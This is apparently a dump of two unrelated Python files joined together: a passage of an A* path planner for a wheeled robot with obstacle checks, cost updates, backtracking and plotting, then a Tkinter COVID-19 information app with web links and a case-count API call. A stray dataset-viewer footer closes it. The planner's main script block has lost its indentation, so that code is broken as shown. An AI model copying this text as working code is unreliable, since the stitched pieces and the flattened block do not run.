        for y in range(0,1001):
            # two circular obstacles
            if (x-200)**2 + (y-200)**2 <= 100**2:
                oblist1.append([x,y])
            if (x-200)**2 + (y-800)**2 <= 100**2:
                oblist1.append([x,y])
            # left square
            if 25 <= x <= 175:
                if 425 <= y <= 575:
                    oblist1.append((x, y))
            # right square
            if 375 <= x <= 625:
                if 425 <= y <= 575:
                    oblist1.append((x, y))
            # top left square
            if 725 <= x <= 875:
                if 200 <= y <= 400:
                    oblist1.append((x, y))
            # inflated versions for riglist
            if (x-200)**2 + (y-200)**2 <= (100+dist)**2:
                riglist.add(str([x,y]))
            if (x-200)**2 + (y-800)**2 <= (100+dist)**2:
                riglist.add(str([x,y]))
            # left square
            # NOTE(review): this uses 75-dist but both the raw region above
            # and obstaclecheck() use x >= 25 — looks like an inconsistency
            # (75 vs 25); confirm which bound is intended.
            if (75-dist) <= x <= (175+dist):
                if (425-dist) <= y <= (575+dist):
                    riglist.add(str([x,y]))
            # right square
            if (375-dist) <= x <= (625+dist):
                if (425-dist) <= y <= (575+dist):
                    riglist.add(str([x,y]))
            # top left square
            if (725-dist) <= x <= (875+dist):
                if (200-dist) <= y <= (400+dist):
                    riglist.add(str([x,y]))
    return oblist1,riglist
def obstaclecheck(x, y):
    """Return True when (x, y) lies inside an obstacle inflated by the robot
    radius + clearance, or inside the inflated map border band; False otherwise.

    Uses module-level xmax/ymax (1000 x 1000 map) for the border checks.
    """
    radius = 10
    clearance = 5
    dist = radius + clearance  # total inflation applied to every obstacle
    # circular obstacles
    if (x-200)**2 + (y-200)**2 <= (100+dist)**2:
        return True
    if (x-200)**2 + (y-800)**2 <= (100+dist)**2:
        return True
    # rectangular obstacles (left, right, top-left squares)
    if (25-dist) <= x <= (175+dist) and (425-dist) <= y <= (575+dist):
        return True
    if (375-dist) <= x <= (625+dist) and (425-dist) <= y <= (575+dist):
        return True
    if (725-dist) <= x <= (875+dist) and (200-dist) <= y <= (400+dist):
        return True
    # map border bands (clearance against the walls)
    if (ymax-dist) <= y <= ymax:
        return True
    if (xmax-dist) <= x <= xmax:
        return True
    if 0 <= x <= dist:
        return True
    if 0 <= y <= dist:
        return True
    # BUG FIX: the original fell off the end and returned None on free space.
    # Callers compare with == True / != True, so behavior is unchanged, but
    # an explicit bool is now returned.
    return False
#Nodes cost calculation
def c2gCalc(start, goal):
    """Euclidean distance between two (x, y) points — the cost-to-goal heuristic."""
    dx = start[0] - goal[0]
    dy = start[1] - goal[1]
    return math.sqrt(dx ** 2 + dy ** 2)
#Confirming expanded node has reached goal space
def goalReachCheck(start, goal):
    """True when *start* lies within the goal-acceptance radius of *goal*."""
    print('checking goal')
    goal_thresh = 100  # acceptance radius around the goal
    dist_sq = (start[0] - goal[0]) ** 2 + (start[1] - goal[1]) ** 2
    return dist_sq <= goal_thresh ** 2
def round_15(child_ang):
    """Quantize an angle in degrees into one of 24 15-degree bins (0..23);
    bin 24 (i.e. 360 degrees) wraps back to bin 0.
    """
    bin_idx = int((round(child_ang / 15) * 15) // 15)
    return 0 if bin_idx == 24 else bin_idx
#Creating / Updating total cost of expanded nodes
def cost_update(child,par,cost,stepprev,stepaft):
    """Update cost matrices, the open queue, and backtracking dictionaries for
    one expanded child node.

    child is [x, y, ang]; par is the queue entry [cost, [x, y, ang]] of the
    parent; cost is the step cost from parent to child; stepprev/stepaft are
    the intermediate curve points produced by Action(). Mutates the
    module-level cost2come/cost2goal/totCost/visited_nodes/path_track/
    path_track1 structures and pushes onto q.
    """
    # Angles quantized to 15-degree bins; positions rounded to even cells
    # (2*coordinate indexes the 2002-wide matrices).
    child_ang=int((round(child[2]/15)*15)//15)
    par_ang=int((round(par[1][2]/15)*15)//15)
    x= child[0]; y = child[1]; z=int(child_ang)
    a = par[1][0]; b = par[1][1]; c = int(par_ang)
    x1=int(round(x/2)*2)
    y1=int(round(y/2)*2)
    a1=int(round(a/2)*2)
    b1=int(round(b/2)*2)
    # Record every intermediate step for fine-grained backtracking.
    i=0
    while i<len(stepprev):
        if str(stepprev[i]) in path_track1:
            path_track1[str(stepprev[i])].append(stepaft[i])
        else:
            path_track1[str(stepprev[i])]=[]
            path_track1[str(stepprev[i])].append(stepaft[i])
        i+=1
    if ((obstaclecheck(x,y)!=True) and (x>0 and x<xmax) and (y>0 and y<ymax) and (child is not None)):
        if visited_nodes[2*x1][2*y1][z]==1:
            # Node seen before: keep it only if the new route is cheaper.
            cost2come[2*x1][2*y1][z]= cost + cost2come[2*a1][2*b1][c]
            totCost1 = cost2come[2*x1][2*y1][z] + cost2goal[2*x1][2*y1][z]
            if totCost1 < totCost[2*x1][2*y1][z]:
                totCost[2*x1][2*y1][z] = totCost1
                if str([a,b]) in path_track:
                    path_track[str([a,b])].append([x,y])
                else:
                    path_track[str([a,b])]=[]
                    path_track[str([a,b])].append([x,y])
        else:
            # First visit: record costs and enqueue for expansion.
            visited_nodes[2*x1][2*y1][z]=1
            cost2come[2*x1][2*y1][z]=cost+cost2come[2*a1][2*b1][c] #Calculating the new cost
            cost2goal[2*x1][2*y1][z]=c2gCalc([x1,y1],[g[0],g[1]])
            totCost[2*x1][2*y1][z]=cost2come[2*x1][2*y1][z]+cost2goal[2*x1][2*y1][z]
            q.put([totCost[2*x1][2*y1][z], [x,y,child[2]]]) #Updating the priority queue
            child=[x,y,z]
            if str([a,b]) in path_track:
                path_track[str([a,b])].append([x,y])
            else:
                path_track[str([a,b])]=[]
                path_track[str([a,b])].append([x,y])
def act_update(step1, step2, rpm1, rpm2):
    """Record, for each intermediate step end point, the wheel-rpm action
    (rpm1, rpm2) that produced it, keyed by str(point) in act_track.
    """
    for idx in range(len(step1)):
        act_track[str(step2[idx])] = [[rpm1, rpm2]]
def main(rpm1, rpm2):
    """A* search loop: pop the cheapest node, stop if it is within the goal
    radius, otherwise expand it with all eight (ul, ur) wheel-rpm actions and
    record costs, backpointers, and the action that produced each step.
    """
    l=0
    while not q.empty(): #and l!=1: #Process when queue is not empty
        a=q.get() #Variable to store the cost and node position
        x_n= a[1][0]; y_n = a[1][1]; z_n=(round(a[1][2]/15)*15)//15
        x_g= g[0]; y_g = g[1]; z_g = int(round(g[2]/15)*15)//15 #g[2]=30 for this project
        #Checking if goal is reached or not
        if goalReachCheck([x_n,y_n],[x_g, y_g]):
            print('goal',x_n,y_n,g)
            i=[x_g,y_g]
            visited.append([x_g,y_g])
            # Link the stopping node to the exact goal so backtracking ends there.
            path_track[str([x_n,y_n])]=[]
            path_track[str([x_n,y_n])].append(i)
            path_track1[str([x_n,y_n])]=[]
            path_track1[str([x_n,y_n])].append(i)
            print('goal reached')
            break
        l+=1
        print(l)
        # Expand with each of the eight action combinations; each act_update
        # must record the same rpm pair that Action() was given.
        child1,cost1,step_list1,step_list2 = Action(a[1],0,rpm1)
        cost_update(child1, a, cost1,step_list1,step_list2)
        act_update(step_list1,step_list2,0,rpm1)
        child2,cost2,step_list1,step_list2 = Action(a[1],rpm1,0)
        cost_update(child2, a, cost2,step_list1,step_list2)
        act_update(step_list1,step_list2,rpm1,0)
        child3,cost3,step_list1,step_list2= Action(a[1],rpm1,rpm1)
        cost_update(child3, a, cost3,step_list1,step_list2)
        # BUG FIX: this expansion uses (rpm1, rpm1) but was recorded as
        # (0, rpm1), so backtracking replayed the wrong action here.
        act_update(step_list1,step_list2,rpm1,rpm1)
        child4,cost4,step_list1,step_list2= Action(a[1],0,rpm2)
        cost_update(child4, a, cost4,step_list1,step_list2)
        act_update(step_list1,step_list2,0,rpm2)
        child5,cost5,step_list1,step_list2 = Action(a[1],rpm2,0)
        cost_update(child5, a, cost5,step_list1,step_list2)
        act_update(step_list1,step_list2,rpm2,0)
        child6,cost6,step_list1,step_list2= Action(a[1],rpm2,rpm2)
        cost_update(child6, a, cost6,step_list1,step_list2)
        act_update(step_list1,step_list2,rpm2,rpm2)
        child7,cost7,step_list1,step_list2 = Action(a[1],rpm1,rpm2)
        cost_update(child7, a, cost7,step_list1,step_list2)
        act_update(step_list1,step_list2,rpm1,rpm2)
        child8,cost8,step_list1,step_list2 = Action(a[1],rpm2,rpm1)
        cost_update(child8, a, cost8,step_list1,step_list2)
        act_update(step_list1,step_list2,rpm2,rpm1)
def plot_ob(path):
    """Draw the obstacle map, start/goal markers, all explored curve segments,
    and the final path (reversed into start-to-goal order) with matplotlib.
    """
    fig, ax = plt.subplots()
    ax.set(xlim=(0, 1000), ylim=(0, 1000))
    # obstacle shapes (two circles, three rectangles)
    c1 = plt.Circle((200, 200), 100, edgecolor = 'k', facecolor = "orange")
    c2 = plt.Circle((200, 800), 100, edgecolor = 'k', facecolor = "orange")
    currentAxis = plt.gca()
    currentAxis.add_patch(Rectangle((25, 425), 150, 150, edgecolor = 'k', facecolor = "orange"))
    currentAxis.add_patch(Rectangle((375, 425), 250, 150, edgecolor = 'k', facecolor = "orange"))
    currentAxis.add_patch(Rectangle((725, 200), 150, 200, edgecolor = 'k', facecolor = "orange"))
    ax.add_artist(c1)
    ax.add_artist(c2)
    ax.set_aspect('equal')
    plt.grid()
    # goal (green) and start (yellow) markers
    plt.plot(g[0], g[1], color='green', marker='o', linestyle='dashed', linewidth=30,
             markersize=30)
    plt.plot(s[0], s[1], color='yellow', marker='o', linestyle='dashed', linewidth=30,
             markersize=30)
    # backtracking produced goal-to-start order; reverse for plotting
    path = path[::-1]
    x_path = [path[i][0] for i in range(len(path))]
    y_path = [path[i][1] for i in range(len(path))]
    plt.plot(x_path, y_path, "-r",linewidth=3.4)
    # all explored segments in blue
    l=0
    while l<len(s_list):
        plt.plot([s_list[l][0], n_list[l][0]], [s_list[l][1], n_list[l][1]],linewidth=1, color="blue")
        l=l+1
def backtracking (start, goal): #Backtracking to find the paths traversed from the initial state to the final state
    """Walk path_track1 backwards from *goal* to *start*, collect the node
    sequence, look up the action taken at each node from act_track, plot the
    result, and return the (goal-to-start ordered) node list.
    """
    val = goal
    path_track_list=[]
    path_track_list.append(val)
    try:
        # debug probes left in by the author — check two hard-coded keys
        if str('[152, 1]') in path_track1.keys():
            print('found')
        else:
            print('key no')
        if '[208, 2]' in path_track1.values():
            print('val found')
        else:
            print('not found')
        #print(path_track1.keys())
        # Repeatedly find the parent whose child list contains val.
        while val!=start:
            for key, values in path_track1.items():
                while val in values:
                    key= ast.literal_eval(key) #converting strings of lists to pure lists
                    val = key
                    path_track_list.append(val)
        # Replay start-to-goal order to collect the action at each node.
        path_track_list1 = path_track_list[::-1]
        for path in path_track_list1:
            for key in act_track.keys():
                if str(path)==key:
                    act.append(act_track.get(key))
        print('Action set',act_track)
        print('final act list',act)
    except KeyError:
        print('value not found')
    plot_ob(path_track_list)
    return path_track_list
def visualization(): #Creating an animation using pygame
    """Clear the pygame display and paint every obstacle cell in yellow."""
    pygame.event.get()
    gameDisplay.fill(black)
    #Setting the obstacle space in the animation
    for path in oblist1:
        x = int(path[0])
        # pygame's y axis points down, so mirror vertically
        y = abs(1000-int(path[1]))
        #pygame.display.flip()
        pygame.draw.rect(gameDisplay, yellow, [x,y,1,1])
        #pygame.time.wait(0)
##################################################### Code execution starts here #######################################################
if __name__ == "__main__":
oblist1, riglist=getobstaclespace() #Retrieve obstacle and clearance information
visualization()
#act.plot_ob()
while True:
# x1=20 #int(input('Enter x coordinate of start node: '))
# y1=20 #int(input('Enter y coordinate of start node: '))
# theta=30 #int(input('Enter degree of start node: ')) #theta for this project is 30
x1=600
y1=800
theta=30
s = [x1,y1,theta] #Start Position
rpm1=int(input('Enter rpm of left wheel: '))
rpm2=int(input('Enter rpm of right wheel: '))
x2=int(input('Enter x coordinate of goal node: '))
y2=int(input('Enter y coordinate of goal node: '))
g = [x2,y2,30] #Goal Position
start= [x1, y1]
goal = [x2, y2]
act_track[str(start)]=[]
act_track[str(start)].append([0,0])
if goalReachCheck(start,goal): #Checking if goal node is the same as the start node
print('start node equal to/within threshold of goal node. Re enter your points again')
continue
elif obstaclecheck(x1,y1)==True: #Checking if start node is in the obstaclespace plus clearance
print('Start node in obstacle space. Re enter the points again')
continue
elif obstaclecheck(x2,y2)==True: #Checking if goal node is in the obstaclespace plus clearance
print('Goal node in obstacle space. Re enter the points again')
continue
elif (x1 <0 or x1> xmax) or (y1<0 or y1 > ymax): #Checking if start node is within the grid(400x300)
print('start node is outside environment. Re enter the points again')
continue
elif (x2 <0 or x2> xmax) or (y2<0 or y2 > ymax): #Checking if goal node is within the grid(400X300)
print('Goal node is outside Environment. Re enter the points again')
continue
else:
break
print(s)
print(g)
visited.append(start)
z=int(round(s[2]/15)*15)//15
visited_nodes[2*x1][2*y1][z]=1
#Initializing the cost to come of start point to zero
cost2come[2*x1][2*y1][z] = 0
#Initializing the cost2goal for start node
cost2goal[2*x1][2*y1][z] = c2gCalc(start,goal)
#Updating the total heurisitc for start node
totCost[2*x1][2*y1][z] = cost2come[2*x1][2*y1][z] + cost2goal[2*x1][2*y1][z]
#print(totCost[2*x1][2*y1][z])
#Initializing the queue with a Total cost and the start node
q.put([totCost[2*x1][2*y1][z], s])
start_time = time.time() #Program start time
main(rpm1,rpm2) #Executing search
#Time to reach goal state
print('time to reach goal',time.time()-start_time)
#Converting start and goal node with threshold of 0.5 units
s=[x1,y1]
g=[x2,y2]
print(g)
#print('path track',path_track)
#Performing backtracking to obtain list for optimal path
path_track_list = backtracking(s, g)
path1=[]
#print(path)
#print('path track',path_track_list)
for path in path_track_list:
pygame.event.get()
x = path[0]
y = abs(1000-path[1])
path1.append((x,y))
pygame.display.flip()
#print('displaying')
#print(x,y)
pygame.draw.rect(gameDisplay, (255,5,5), [x,y,5,5])
#pygame.image.save(gameDisplay, f"/home/jayesh/Documents/ENPM661_PROJECT1/map1/{im_count}.png") #Saving the images to create a video #uncomment if not required
#im_count+=1
pygame.time.wait(20)
plt.show()
#Terminate Pygame
pygame.quit()
#Print the total time taken to reach goal state and backtrack
print("total time:")
print(time.time()-start_time)
############################################# Code Execution ends here #############################################################
|
import requests
import tkinter as tk
import webbrowser as wb
class Application(tk.Frame):
    """Tkinter UI offering COVID-19 resource shortcuts (web links) plus a
    live national case-count window backed by the covid19tracker.ca API.
    """

    def __init__(self, master=None):
        super().__init__(master)
        self.master = master
        self.pack()
        self.create_widgets()

    def create_widgets(self):
        """Build one button per resource and a close button."""
        self.vaccine = tk.Button(self, text="Find a COVID-19 Vaccination Center Near Me", command=self.vaccination)
        self.vaccine.pack(side="top")
        self.tests = tk.Button(self, text="Find a COVID-19 Assessment Center Near Me", command=self.testing)
        self.tests.pack(side="top")
        self.cases = tk.Button(self, text="Updated COVID-19 Case Counts", command=self.casecounts)
        self.cases.pack(side="top")
        self.rollout = tk.Button(self, text="Information on Canada's Vaccine Rollout", command=self.vacroll)
        self.rollout.pack(side="top")
        self.discord = tk.Button(self, text="Join the Vaccine Hunters Canada Discord Server!", command=self.vachunt)
        self.discord.pack(side="top")
        # NOTE: this attribute shadows tk.Frame.quit; kept for compatibility.
        self.quit = tk.Button(self, text="Close the Program", fg="red",
                              command=self.master.destroy)
        self.quit.pack(side="bottom")

    def vaccination(self):
        """Open a maps search for nearby vaccination centers."""
        wb.open("https://www.google.ca/maps/search/covid+vaccine+near+me")

    def testing(self):
        """Open a maps search for nearby assessment centers."""
        wb.open("https://www.google.ca/maps/search/covid+assessment+sites+near+me")

    def casecounts(self):
        """Fetch the latest national summary and show it in a popup window."""
        window = tk.Toplevel(self.master)
        window.title("COVID-19 Case Counts - Canada")
        requestAPI = requests.get("https://api.covid19tracker.ca/summary")
        api = requestAPI.json()["data"]
        # BUG FIX: the API returns the change_* counts as numbers; the
        # original concatenated them directly to str, raising TypeError.
        # Coerce every field through str() before concatenation.
        tk.Label(master=window, text="As of " + str(api[0]["latest_date"]) + " in Canada, there are: \n" + str(api[0]["change_cases"]) + " new cases\n"
                 + str(api[0]["change_fatalities"]) + " new deaths\n"
                 + str(api[0]["change_recoveries"]) + " new recoveries").pack()
        tk.Button(master=window, text="Click here to see a visualization of cases in Canada", command=self.casecountvisual).pack()

    def casecountvisual(self):
        """Open a web search showing a case-count visualization."""
        wb.open("https://www.google.com/search?q=covid+19+cases")

    def vacroll(self):
        """Open the official Canadian vaccine-rollout information page."""
        wb.open("https://www.canada.ca/en/public-health/services/diseases/coronavirus-disease-covid-19/vaccines/how-vaccinated.html")

    def vachunt(self):
        """Open the Vaccine Hunters Canada Discord invite."""
        wb.open("https://discord.gg/nKAE9Cta")
# Build the root window, add the welcome banner, and start the event loop.
root = tk.Tk()
topFrame = tk.Frame()  # NOTE(review): created but never packed/used
tk.Label(text="Welcome to the COVID-19 Information Center \nHere, you'll find resources to help the world fight against the COVID-19 pandemic!").pack(side="top")
app = Application(master=root)
app.master.title("COVID-19 Information Center")
app.mainloop()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.